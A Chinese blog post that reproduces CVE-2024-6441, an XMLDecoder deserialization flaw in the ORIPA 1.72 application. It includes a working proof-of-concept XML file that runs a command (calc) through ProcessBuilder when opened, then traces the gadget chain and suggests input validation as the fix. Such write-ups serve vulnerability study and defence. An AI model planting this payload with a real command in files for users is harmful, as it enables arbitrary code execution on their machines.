CVE-2024-6441 oripa1.72 反序列化漏洞复现

已于 2024-07-24 21:58:46 修改
阅读量188 收藏 1
点赞数 10
文章标签: java
于 2024-07-24 21:50:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50963067/article/details/140286253
版权

一、复现步骤

1. 将JDK版本设置为JDK 21,启动oripa的exe文件或jar包

2. 通过oripa界面的File->open路径上传一个XML文件

在这里插入图片描述

XML内容如下
<java>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1" >
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start"/>
    </object>
</java>

3. 弹出计算器,复现成功

在这里插入图片描述

二、原理分析

1. Gadget Chain如下所示

java.beans.XMLDecoder#readObject

java.beans.XMLDecoder#parsingComplete

java.security.AccessController#doPrivileged(java.security.PrivilegedAction<T>, java.security.AccessControlContext)

java.security.AccessController#executePrivileged(java.security.PrivilegedAction<T>, java.security.AccessControlContext, java.lang.Class<?>)

java.security.PrivilegedAction#run

com.sun.beans.decoder.DocumentHandler#parse

java.security.ProtectionDomain.JavaSecurityAccessImpl#doIntersectionPrivilege(java.security.PrivilegedAction<T>, java.security.AccessControlContext, java.security.AccessControlContext)

java.security.AccessController#doPrivileged(java.security.PrivilegedAction<T>, java.security.AccessControlContext)

java.security.AccessController#executePrivileged(java.security.PrivilegedAction<T>, java.security.AccessControlContext, java.lang.Class<?>)

java.security.PrivilegedAction#run

com.sun.org.apache.xerces.internal.jaxp.SAXParserImpl#parse(org.xml.sax.InputSource, org.xml.sax.helpers.DefaultHandler)

com.sun.org.apache.xerces.internal.jaxp.SAXParserImpl.JAXPSAXParser#parse(org.xml.sax.InputSource)

com.sun.org.apache.xerces.internal.parsers.XMLParser#parse

com.sun.org.apache.xerces.internal.parsers.XML11Configuration#parse(com.sun.org.apache.xerces.internal.xni.parser.XMLInputSource)

com.sun.org.apache.xerces.internal.parsers.XML11Configuration#parse(boolean)

com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl#scanDocument

com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl#next

com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.FragmentContentDriver#next

com.sun.org.apache.xerces.internal.parsers.AbstractXMLDocumentParser#emptyElement

com.sun.org.apache.xerces.internal.parsers.AbstractSAXParser#endElement

com.sun.beans.decoder.DocumentHandler#endElement

com.sun.beans.decoder.ElementHandler#endElement

com.sun.beans.decoder.NewElementHandler#getValueObject()

com.sun.beans.decoder.ObjectElementHandler#getValueObject

com.sun.beans.decoder.ValueObjectImpl#create

java.beans.Expression#getValue

java.beans.Statement#invoke

java.beans.Statement#invokeInternal

sun.reflect.misc.MethodUtil#invoke

java.lang.reflect.Method#invoke(java.lang.Object, java.lang.Object...)

...省略较多invoke方法,最后通过反射调用ProcessBuilder的start方法弹出计算器

java.lang.ProcessBuilder#start(java.lang.ProcessBuilder.Redirect[])

2. source方法和sink方法

XMLDecoder的readObject即为source方法,它是反序列化入口点。

在这里插入图片描述

个人认为,java.lang.reflect.Method的invoke可以作为sink方法,该方法通过反射调用一个类的某个方法,在此处传入的即为ProcessBuilder类的start方法

在这里插入图片描述

3. 个人见解

该漏洞的成因与WebLogic漏洞类似,即不建议直接使用jdk原生的XMLDecoder来处理XML文档,应当加上对XML文件内容的验证,修复建议可以参考WebLogic。

传入XML的效果其实等价于new java.lang.ProcessBuilder(new String[]{"calc"}).start();

在这里插入图片描述

4. 建议阅读链接

https://www.cnblogs.com/LittleHann/p/17814641.html
https://zhuanlan.zhihu.com/p/350309128
https://zhuanlan.zhihu.com/p/623500182

爱喝拿铁.
关注
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)
0xSec
12-24 776
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 2784
CVE-2016-4437 Shiro反序列化漏洞复现
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload
2401_84264662的博客
04-26 970
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload(1)
2301_77121488的博客
05-13 1151
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
ActiveMQ反序列化漏洞CVE-2015-5254复现
Cwillchris的博客
03-31 7757
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞复现教程_Cwillchris的博客-CSDN博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
【vulhub漏洞复现CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 1891
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
【网络安全---漏洞复现】Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271)
m0_67844671的博客
09-13 652
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271);​ Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
CVE-2022-25845 反序列化漏洞分析
把梦想放飞在蓝色的天空里...
09-20 7091
CVE-2022-25845 反序列化漏洞分析
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2866
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
SpringBoot修复Spring AMQP反序列化漏洞CVE-2023-34050)
记录点滴
10-27 4585
问题描述: 2023年10月 Spring官方披露 CVE-2023-34050 Spring AMQP反序列化漏洞漏洞。由于 SimpleMessageConverter 或 SerializerMessageConverter 默认未配置白名单,导致可以反序列化任意类。新版本中在未配置白名单的情况下则不允许反序列化任意类。 解决的建议: 1.spring-amqp版本低于2.4.17的用户应升级到2.4.17 2.spring-amqp是3.0.0至3.0.9版本的用户应升级至3.0.10
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
最新发布
qq_43700885的博客
07-29 272
1.导入hutool的maven依赖。2.复制一下代码执行。
golang 接口
m0_70982551的博客
07-24 1074
接口定义了一组方法,这些方法没有具体的实现。接口类型的变量可以存储任何实现了这些方法的类型的值。// 更多方法...在Go语言中,接口值是指存储了实现某个接口的具体类型值的变量。接口值由两部分组成:1.动态类型:这是接口值当前存储的实际类型。2.动态值:这是实际存储的值,该值必须实现了接口中定义的所有方法。
java判断邮箱地址是否正确,使用hutool工具判断邮箱地址是否正确
qq_43700885的博客
07-29 121
1.导入hutool的maven依赖。2.直接复制一下代码运行。
Swagger使用Map接受参数时,页面如何显示具体参数及说
a1058926697的博客
07-26 584
后端使用Map接受参数,要求在swagger页面上显示具体的参数名称、类型及说明。当Map接受参数数量少时,可以使用Swagger自带的注解。自定义注解 @ApiGlobalModel。编写处理注解对应的插件。
CVE-2020-14644:WebLogic IIOP反序列化漏洞深度解析
"CVE-2020-14644是一个针对Oracle WebLogic Server的IIOP(Internet Inter-ORB Protocol)反序列化漏洞,主要影响12.2.1.3.0, 12.2.1.4.0, 和14.1.1.0.0这几个版本。该漏洞允许攻击者通过精心构造的恶意输入来触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值